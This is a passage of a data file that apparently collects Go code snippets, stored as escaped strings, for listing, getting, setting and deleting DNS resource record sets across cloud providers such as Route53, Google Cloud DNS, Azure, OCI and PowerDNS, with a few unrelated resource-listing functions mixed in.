&route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: zone,\n\t}\n\thostedZoneRecordSets, err := svc.ListResourceRecordSets(rrInput)\n\n\tif err != nil {\n\t\tfmt.Printf(\"error obtaining hosted zone %s by id: %s\", aws.StringValue(zone), err)\n\t\treturn nil, err\n\t}\n\n\treturn hostedZoneRecordSets, nil\n}", "func (d *DNS) GetResourceRecordSet(projectID string, managedZone string, name string) (*v1.ResourceRecordSet, error) {\n\tctx := context.Background()\n\trrsService := v1.NewResourceRecordSetsService(d.V1)\n\trrsListCall := rrsService.List(projectID, managedZone).Context(ctx).Name(name)\n\trrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif len(rrsList.Rrsets) == 0 {\n\t\treturn nil, nil\n\t}\n\treturn rrsList.Rrsets[0], nil\n}", "func listAllRecordSets(r53 *route53.Route53, id string) (rrsets []*route53.ResourceRecordSet, err error) {\n\treq := route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: &id,\n\t}\n\n\tfor {\n\t\tvar resp *route53.ListResourceRecordSetsOutput\n\t\tresp, err = r53.ListResourceRecordSets(&req)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\trrsets = append(rrsets, resp.ResourceRecordSets...)\n\t\tif *resp.IsTruncated {\n\t\t\treq.StartRecordName = resp.NextRecordName\n\t\t\treq.StartRecordType = resp.NextRecordType\n\t\t\treq.StartRecordIdentifier = resp.NextRecordIdentifier\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// unescape wildcards\n\t//for _, rrset := range rrsets {\n\t//\trrset.Name = aws.String(unescaper.Replace(*rrset.Name))\n\t//}\n\n\treturn\n}", "func (o *dnsOp) listRecords(zone dnsprovider.Zone) ([]dnsprovider.ResourceRecordSet, error) {\n\tkey := zone.Name() + \"::\" + zone.ID()\n\n\trrs := o.recordsCache[key]\n\tif rrs == nil {\n\t\trrsProvider, ok := zone.ResourceRecordSets()\n\t\tif !ok {\n\t\t\treturn nil, fmt.Errorf(\"zone does not support resource records %q\", zone.Name())\n\t\t}\n\n\t\tklog.V(2).Infof(\"Querying all dnsprovider records for zone %q\", zone.Name())\n\t\tvar err error\n\t\trrs, err = rrsProvider.List()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"error querying resource records for zone %q: %v\", zone.Name(), err)\n\t\t}\n\n\t\to.recordsCache[key] = rrs\n\t}\n\n\treturn rrs, nil\n}", "func GetResourceRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *ResourceRecordSetState, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tvar resource ResourceRecordSet\n\terr := ctx.ReadResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (api *powerdnsProvider) GetZoneRecords(domain string) (models.Records, error) {\n\tzone, err := api.client.Zones().GetZone(context.Background(), api.ServerName, domain)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcurRecords := models.Records{}\n\t// loop over grouped records by type, called RRSet\n\tfor _, rrset := range zone.ResourceRecordSets {\n\t\tif rrset.Type == \"SOA\" {\n\t\t\tcontinue\n\t\t}\n\t\t// loop over single records of this group and create records\n\t\tfor _, pdnsRecord := range rrset.Records {\n\t\t\tr, err := toRecordConfig(domain, pdnsRecord, rrset.TTL, rrset.Name, rrset.Type)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tcurRecords = append(curRecords, r)\n\t\t}\n\t}\n\n\treturn curRecords, nil\n}", "func (c *DeviceController) GetRecords(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\tres := r53.GetRecordSets(vars[\"id\"])\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func (m *MockClient) ListResourceRecordSets(input *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", input)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (p *PDNSProvider) Records(ctx context.Context) (endpoints []*endpoint.Endpoint, _ error) {\n\tzones, _, err := p.client.ListZones()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfilteredZones, _ := p.client.PartitionZones(zones)\n\n\tfor _, zone := range filteredZones {\n\t\tz, _, err := p.client.ListZone(zone.Id)\n\t\tif err != nil {\n\t\t\tlog.Warnf(\"Unable to fetch Records\")\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, rr := range z.Rrsets {\n\t\t\te, err := p.convertRRSetToEndpoints(rr)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tendpoints = append(endpoints, e...)\n\t\t}\n\t}\n\n\tlog.Debugf(\"Records fetched:\\n%+v\", endpoints)\n\treturn endpoints, nil\n}", "func (m *MockClient) ListResourceRecordSets(arg0 *route53.ListResourceRecordSetsInput) (*route53.ListResourceRecordSetsOutput, error) {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"ListResourceRecordSets\", arg0)\n\tret0, _ := ret[0].(*route53.ListResourceRecordSetsOutput)\n\tret1, _ := ret[1].(error)\n\treturn ret0, ret1\n}", "func (s *dnsRecordSetLister) DnsRecordSets(namespace string) DnsRecordSetNamespaceLister {\n\treturn dnsRecordSetNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func (d *DNS) SetResourceRecordSets(projectID string, managedZone string, records []*v1.ResourceRecordSet) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tvar additions []*v1.ResourceRecordSet\n\tvar change *v1.Change\n\tlogItems := []string{}\n\tfor _, record := range records {\n\t\texisting, err := d.GetResourceRecordSet(projectID, managedZone, record.Name)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Error trying to get existing resource record set: %s\", err)\n\t\t}\n\t\taction := \"creating\"\n\t\tif existing != nil {\n\t\t\tdeletions = append(deletions, existing)\n\t\t\taction = \"recreating\"\n\t\t}\n\t\tlogItems = append(logItems, fmt.Sprintf(\"====> %s %s => %s %s\", action, record.Name, record.Type, strings.Join(record.Rrdatas, \",\")))\n\t\tadditions = append(additions, record)\n\t}\n\td.log.Info(\"Ensuring the DNS zone %s has the following records:\", managedZone)\n\tfor _, item := range logItems {\n\t\td.log.ListItem(item)\n\t}\n\tif len(deletions) > 0 {\n\t\tchange = &v1.Change{\n\t\t\tDeletions: deletions,\n\t\t}\n\t\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tchange = &v1.Change{\n\t\tAdditions: additions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (a *azurednsProvider) GetZoneRecords(domain string, meta map[string]string) (models.Records, error) {\n\texistingRecords, _, _, err := a.getExistingRecords(domain)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn existingRecords, nil\n}", "func (api *packetframeProvider) GetZoneRecords(domain string, meta map[string]string) (models.Records, error) {\n\n\tzone, err := api.getZone(domain)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"no such zone %q in Packetframe account\", domain)\n\t}\n\n\trecords, err := api.getRecords(zone.ID)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"could not load records for domain %q\", domain)\n\t}\n\n\texistingRecords := make([]*models.RecordConfig, len(records))\n\n\tdc := models.DomainConfig{\n\t\tName: domain,\n\t}\n\n\tfor i := range records {\n\t\texistingRecords[i] = toRc(&dc, &records[i])\n\t}\n\n\treturn existingRecords, nil\n}", "func (s *FastDNSv2Service) GetChangeListRecordSets(ctx context.Context, zone string, opt *ChangeListOptions) (*ChangeListRecords, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/changelists/%v/recordsets\", zone)\n\tu, err := addOptions(u, opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tc := new(ChangeListRecords)\n\tresp, err := s.client.Do(ctx, req, &c)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn c, resp, nil\n\n}", "func (client DnsClient) getZoneRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetZoneRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func GetRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RecordSetState, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tvar resource RecordSet\n\terr := ctx.ReadResource(\"gcp:dns/recordSet:RecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RecordSetState, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tvar resource RecordSet\n\terr := ctx.ReadResource(\"gcp:dns/recordSet:RecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func findRecord(d *schema.ResourceData, meta interface{}) (*route53.ResourceRecordSet, error) {\n\tconn := meta.(*AWSClient).r53conn\n\t// Scan for a\n\tzone := cleanZoneID(d.Get(\"zone_id\").(string))\n\n\t// get expanded name\n\tzoneRecord, err := conn.GetHostedZone(&route53.GetHostedZoneInput{Id: aws.String(zone)})\n\tif err != nil {\n\t\tif r53err, ok := err.(awserr.Error); ok && r53err.Code() == \"NoSuchHostedZone\" {\n\t\t\treturn nil, r53NoHostedZoneFound\n\t\t}\n\t\treturn nil, err\n\t}\n\n\ten := expandRecordName(d.Get(\"name\").(string), *zoneRecord.HostedZone.Name)\n\tlog.Printf(\"[DEBUG] Expanded record name: %s\", en)\n\td.Set(\"fqdn\", en)\n\n\tlopts := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(cleanZoneID(zone)),\n\t\tStartRecordName: aws.String(en),\n\t\tStartRecordType: aws.String(d.Get(\"type\").(string)),\n\t}\n\n\tlog.Printf(\"[DEBUG] List resource records sets for zone: %s, opts: %s\",\n\t\tzone, lopts)\n\tresp, err := conn.ListResourceRecordSets(lopts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, record := range resp.ResourceRecordSets {\n\t\tname := cleanRecordName(*record.Name)\n\t\tif FQDN(strings.ToLower(name)) != FQDN(strings.ToLower(*lopts.StartRecordName)) {\n\t\t\tcontinue\n\t\t}\n\t\tif strings.ToUpper(*record.Type) != strings.ToUpper(*lopts.StartRecordType) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif record.SetIdentifier != nil && *record.SetIdentifier != d.Get(\"set_identifier\") {\n\t\t\tcontinue\n\t\t}\n\t\t// The only safe return where a record is found\n\t\treturn record, nil\n\t}\n\treturn nil, r53NoRecordsFound\n}", "func (r Dns_Domain) GetResourceRecords() (resp []datatypes.Dns_Domain_ResourceRecord, err error) {\n\terr = r.Session.DoRequest(\"SoftLayer_Dns_Domain\", \"getResourceRecords\", nil, &r.Options, &resp)\n\treturn\n}", "func GetRecord(zoneID string, domainname string) (RecordValues, error) {\n\tvar r RecordValues\n\tb, err := proc.RunW(\"aws\", \"route53\", \"list-resource-record-sets\", \"--hosted-zone-id\", zoneID, \"--query\", fmt.Sprintf(\"ResourceRecordSets[?Name == '%s']\", domainname))\n\tif err != nil {\n\t\treturn r, err\n\t}\n\n\tv := []ResourceRecordSet{}\n\terr = json.Unmarshal([]byte(b), &v)\n\tif err != nil {\n\t\treturn r, err\n\t}\n\tif len(v) == 0 {\n\t\treturn r, nil\n\t}\n\n\tr = RecordValues{v[0].Name, v[0].Type, v[0].ResourceRecords[0].Value}\n\treturn r, nil\n}", "func (o *ClusterUninstaller) getMatchingRecordSets(parentRecords, childRecords []*dns.ResourceRecordSet) []*dns.ResourceRecordSet {\n\tmatchingRecordSets := []*dns.ResourceRecordSet{}\n\trecordKey := func(r *dns.ResourceRecordSet) string {\n\t\treturn fmt.Sprintf(\"%s %s\", r.Type, r.Name)\n\t}\n\tchildKeys := sets.NewString()\n\tfor _, record := range childRecords {\n\t\tchildKeys.Insert(recordKey(record))\n\t}\n\tfor _, record := range parentRecords {\n\t\tif childKeys.Has(recordKey(record)) {\n\t\t\tmatchingRecordSets = append(matchingRecordSets, record)\n\t\t}\n\t}\n\treturn matchingRecordSets\n}", "func (client *AuroraDNSClient) GetRecords(zoneID string) ([]records.GetRecordsResponse, error) {\n\tlogrus.Debugf(\"GetRecords(%s)\", zoneID)\n\trelativeURL := fmt.Sprintf(\"zones/%s/records\", zoneID)\n\n\tresponse, err := client.requestor.Request(relativeURL, \"GET\", []byte(\"\"))\n\tif err != nil {\n\t\tlogrus.Errorf(\"Failed to receive records: %s\", err)\n\t\treturn nil, err\n\t}\n\n\tvar respData []records.GetRecordsResponse\n\terr = json.Unmarshal(response, &respData)\n\tif err != nil {\n\t\tlogrus.Errorf(\"Failed to unmarshall response: %s\", err)\n\t\treturn nil, err\n\t}\n\n\treturn respData, nil\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(input interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), input)\n}", "func (d *DNS) DeleteResourceRecordSets(projectID string, managedZone string) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tresourceRecordSets, err := d.GetResourceRecordSets(projectID, managedZone)\n\tif err != nil {\n\t\treturn err\n\t}\n\td.log.Info(\"Deleting all records from DNS zone %s:\", managedZone)\n\tfor _, resourceRecordSet := range resourceRecordSets {\n\t\tif resourceRecordSet.Type == \"SOA\" || resourceRecordSet.Type == \"NS\" {\n\t\t\tcontinue\n\t\t}\n\t\tdeletions = append(deletions, resourceRecordSet)\n\t\td.log.ListItem(\"%s %s\", resourceRecordSet.Type, resourceRecordSet.Name)\n\t}\n\tchange := &v1.Change{\n\t\tDeletions: deletions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func NewResourceRecordSet(ctx *pulumi.Context,\n\tname string, args *ResourceRecordSetArgs, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"managedZone\",\n\t\t\"project\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource ResourceRecordSet\n\terr := ctx.RegisterResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (mr *MockClientMockRecorder) ListResourceRecordSets(arg0 interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"ListResourceRecordSets\", reflect.TypeOf((*MockClient)(nil).ListResourceRecordSets), arg0)\n}", "func NewRecordSetsClient(con *armcore.Connection, subscriptionID string) *RecordSetsClient {\n\treturn &RecordSetsClient{con: con, subscriptionID: subscriptionID}\n}", "func (s *FastDNSv2Service) GetRecordSet(ctx context.Context, opt *RecordSetOptions) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", opt.Zone, opt.Name, opt.Type)\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar rs *RecordSet\n\tresp, err := s.client.Do(ctx, req, &rs)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn rs, resp, nil\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\treturn nil, fmt.Errorf(\"not implemented\")\n}", "func (p *Provider) SetRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar updatedRecords []libdns.Record\n\n\tvar resourceRecordSets []LeasewebRecordSet\n\n\tfor _, record := range records {\n\n\t\trecordSet := LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tresourceRecordSets = append(resourceRecordSets, recordSet)\n\n\t\tupdatedRecords = append(updatedRecords, record)\n\t}\n\n\tbody := &LeasewebRecordSets{\n\t\tResourceRecordSets: resourceRecordSets,\n\t}\n\n\tbodyBuffer := new(bytes.Buffer)\n\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\treq, err := http.NewRequest(http.MethodPut, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\treturn updatedRecords, nil\n}", "func (o ElastigroupIntegrationRoute53DomainOutput) RecordSets() ElastigroupIntegrationRoute53DomainRecordSetArrayOutput {\n\treturn o.ApplyT(func(v ElastigroupIntegrationRoute53Domain) []ElastigroupIntegrationRoute53DomainRecordSet {\n\t\treturn v.RecordSets\n\t}).(ElastigroupIntegrationRoute53DomainRecordSetArrayOutput)\n}", "func (s *ResourceRecordSetServer) ListDnsResourceRecordSet(ctx context.Context, request *dnspb.ListDnsResourceRecordSetRequest) (*dnspb.ListDnsResourceRecordSetResponse, error) {\n\tcl, err := createConfigResourceRecordSet(ctx, request.ServiceAccountFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresources, err := cl.ListResourceRecordSet(ctx, request.Project, request.ManagedZone)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar protos []*dnspb.DnsResourceRecordSet\n\tfor _, r := range resources.Items {\n\t\trp := ResourceRecordSetToProto(r)\n\t\tprotos = append(protos, rp)\n\t}\n\treturn &dnspb.ListDnsResourceRecordSetResponse{Items: protos}, nil\n}", "func (client DnsClient) GetZoneRecords(ctx context.Context, request GetZoneRecordsRequest) (response GetZoneRecordsResponse, err error) {\n\tvar ociResponse common.OCIResponse\n\tpolicy := common.NoRetryPolicy()\n\tif request.RetryPolicy() != nil {\n\t\tpolicy = *request.RetryPolicy()\n\t}\n\tociResponse, err = common.Retry(ctx, request, client.getZoneRecords, policy)\n\tif err != nil {\n\t\tif ociResponse != nil {\n\t\t\tif httpResponse := ociResponse.HTTPResponse(); httpResponse != nil {\n\t\t\t\topcRequestId := httpResponse.Header.Get(\"opc-request-id\")\n\t\t\t\tresponse = GetZoneRecordsResponse{RawResponse: httpResponse, OpcRequestId: &opcRequestId}\n\t\t\t} else {\n\t\t\t\tresponse = GetZoneRecordsResponse{}\n\t\t\t}\n\t\t}\n\t\treturn\n\t}\n\tif convertedResponse, ok := ociResponse.(GetZoneRecordsResponse); ok {\n\t\tresponse = convertedResponse\n\t} else {\n\t\terr = fmt.Errorf(\"failed to convert OCIResponse into GetZoneRecordsResponse\")\n\t}\n\treturn\n}", "func (client DnsClient) getDomainRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records/{domain}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetDomainRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (zone *Zone) Records() []dns.RR {\n\treturn zone.records\n}", "func (record *PrivateDnsZonesSRVRecord) GetResourceScope() genruntime.ResourceScope {\n\treturn genruntime.ResourceScopeResourceGroup\n}", "func (client DnsClient) getRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func (p *Provider) GetResources(pc *domain.ProviderConfig) ([]*domain.Resource, error) {\n\tclient, err := p.getBigQueryClient(pc.URN, Credentials(pc.Credentials.(string)))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresources := []*domain.Resource{}\n\tctx := context.Background()\n\tdatasets, err := client.GetDatasets(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, d := range datasets {\n\t\tdataset := d.toDomain()\n\t\tdataset.ProviderType = pc.Type\n\t\tdataset.ProviderURN = pc.URN\n\t\tresources = append(resources, dataset)\n\n\t\ttables, err := client.GetTables(ctx, dataset.Name)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor _, t := range tables {\n\t\t\ttable := t.toDomain()\n\t\t\ttable.ProviderType = pc.Type\n\t\t\ttable.ProviderURN = pc.URN\n\t\t\tresources = append(resources, table)\n\t\t}\n\t}\n\n\treturn resources, nil\n}", "func ExtractRecordSets(r pagination.Page) ([]RecordSet, error) {\n\tvar s struct {\n\t\tRecordSets []RecordSet `json:\"recordsets\"`\n\t}\n\terr := (r.(RecordSetPage)).ExtractInto(&s)\n\treturn s.RecordSets, err\n}", "func listRecords(client *dnsimple.Client, accountID, domain string,\n\toptions *dnsimple.ZoneRecordListOptions) (records zoneRecords, err error) {\n\tif options == nil {\n\t\toptions = &dnsimple.ZoneRecordListOptions{}\n\t}\n\tfor p := 1; ; p++ {\n\t\tlistZoneRecordsResponse, err := client.Zones.ListRecords(accountID, domain, options)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor i := range listZoneRecordsResponse.Data {\n\t\t\trecords = append(records, listZoneRecordsResponse.Data[i])\n\t\t}\n\t\tif options.Page == 0 {\n\t\t\toptions.Page = 2\n\t\t} else {\n\t\t\toptions.Page++\n\t\t}\n\t\tif p >= listZoneRecordsResponse.Pagination.TotalPages {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn\n}", "func (client *RecordSetsClient) listCreateRequest(ctx context.Context, resourceGroupName string, privateZoneName string, options *RecordSetsListOptions) (*azcore.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/privateDnsZones/{privateZoneName}/ALL\"\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\tif privateZoneName == \"\" {\n\t\treturn nil, errors.New(\"parameter privateZoneName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{privateZoneName}\", url.PathEscape(privateZoneName))\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\treq, err := azcore.NewRequest(ctx, http.MethodGet, azcore.JoinPaths(client.con.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treq.Telemetry(telemetryInfo)\n\treqQP := req.URL.Query()\n\tif options != nil && options.Top != nil {\n\t\treqQP.Set(\"$top\", strconv.FormatInt(int64(*options.Top), 10))\n\t}\n\tif options != nil && options.Recordsetnamesuffix != nil {\n\t\treqQP.Set(\"$recordsetnamesuffix\", *options.Recordsetnamesuffix)\n\t}\n\treqQP.Set(\"api-version\", \"2020-06-01\")\n\treq.URL.RawQuery = reqQP.Encode()\n\treq.Header.Set(\"Accept\", \"application/json\")\n\treturn req, nil\n}", "func (m *Master) getBatchResources(c *Config) map[string]rest.Storage {\n\tresourceOverrides := m.ApiGroupVersionOverrides[\"batch/v1\"].ResourceOverrides\n\tisEnabled := func(resource string) bool {\n\t\t// Check if the resource has been overriden.\n\t\tif enabled, ok := resourceOverrides[resource]; ok {\n\t\t\treturn enabled\n\t\t}\n\t\treturn !m.ApiGroupVersionOverrides[\"batch/v1\"].Disable\n\t}\n\n\tstorage := map[string]rest.Storage{}\n\tif isEnabled(\"jobs\") {\n\t\tm.constructJobResources(c, storage)\n\t}\n\treturn storage\n}", "func (rs *ResourceCollection) Resources() []Resource {\n\trs.checkMap()\n\tres := []Resource{}\n\n\tfor _, r := range rs.resources {\n\t\tres = append(res, r)\n\t}\n\treturn res\n}", "func (d *instanceProvider) GetResource(ctx context.Context) (*schema.Resources, error) {\n\tlist := &schema.Resources{}\n\n\tfor _, zone := range scw.AllZones {\n\t\treq := &instance.ListServersRequest{\n\t\t\tZone: zone,\n\t\t}\n\t\tvar totalResults uint32\n\t\tfor {\n\t\t\tresp, err := d.instanceAPI.ListServers(req)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tfor _, server := range resp.Servers {\n\t\t\t\ttotalResults++\n\n\t\t\t\tvar ip4, privateIP4 string\n\t\t\t\tif server.PublicIP != nil && server.PublicIP.Address != nil {\n\t\t\t\t\tip4 = server.PublicIP.Address.String()\n\t\t\t\t}\n\t\t\t\tif server.PrivateIP != nil {\n\t\t\t\t\tprivateIP4 = *server.PrivateIP\n\t\t\t\t}\n\t\t\t\tlist.Append(&schema.Resource{\n\t\t\t\t\tProvider: providerName,\n\t\t\t\t\tPublicIPv4: ip4,\n\t\t\t\t\tProfile: d.profile,\n\t\t\t\t\tPrivateIpv4: privateIP4,\n\t\t\t\t\tPublic: ip4 != \"\",\n\t\t\t\t})\n\t\t\t}\n\t\t\tif resp.TotalCount == totalResults {\n\t\t\t\tbreak\n\t\t\t}\n\t\t\t*req.Page = *req.Page + 1\n\t\t}\n\t}\n\treturn list, nil\n}", "func NewRecordSet(v dns.RecordSet) (*RecordSet, error) {\n\tr := RecordSet{}\n\tr.Name = *v.Name\n\tr.Type = strings.Replace(*v.Type, \"Microsoft.Network/dnszones/\", \"\", -1)\n\tr.Mark = \"\"\n\tr.Properties.TTL = int(*(*v.RecordSetProperties).TTL)\n\n\t// r.Properties.Values is empty, need to be initialized.\n\t// I prefer doing so in each switch/case sentence.\n\tswitch r.Type {\n\tcase \"A\":\n\t\tfor _, v := range *v.RecordSetProperties.ARecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv4Address)\n\t\t}\n\tcase \"AAAA\":\n\t\tfor _, v := range *v.RecordSetProperties.AaaaRecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv6Address)\n\t\t}\n\tcase \"CNAME\":\n\t\tr.Properties.Values = append(r.Properties.Values, *v.RecordSetProperties.CnameRecord.Cname)\n\tcase \"MX\":\n\t\tfor _, v := range *v.RecordSetProperties.MxRecords {\n\t\t\tpref := strconv.FormatInt(int64(*v.Preference), 10)\n\t\t\tr.Properties.Values = append(r.Properties.Values, pref+\" \"+*v.Exchange)\n\t\t}\n\tcase \"NS\":\n\t\tfor _, v := range *v.RecordSetProperties.NsRecords {\n\t\t\t// Append to the golbal variable\n\t\t\tnsrecords = append(nsrecords, *v.Nsdname)\n\t\t}\n\tcase \"TXT\":\n\t\tfor _, v := range *v.RecordSetProperties.TxtRecords {\n\t\t\t// Concat values into one string\n\t\t\ts := \"\"\n\t\t\tfor _, w := range *v.Value {\n\t\t\t\ts += w\n\t\t\t}\n\t\t\tr.Properties.Values = append(r.Properties.Values, s)\n\t\t}\n\tcase \"CAA\":\n\t\tcps := []CaaProperty{}\n\t\tfor _, v := range *v.RecordSetProperties.CaaRecords {\n\t\t\tcp := CaaProperty{\n\t\t\t\tFlags: v.Flags,\n\t\t\t\tTag: *v.Tag,\n\t\t\t\tValue: *v.Value,\n\t\t\t}\n\t\t\tcps = append(cps, cp)\n\t\t}\n\n\t\tr.Properties.CaaProperties = cps\n\tdefault:\n\t\treturn nil, 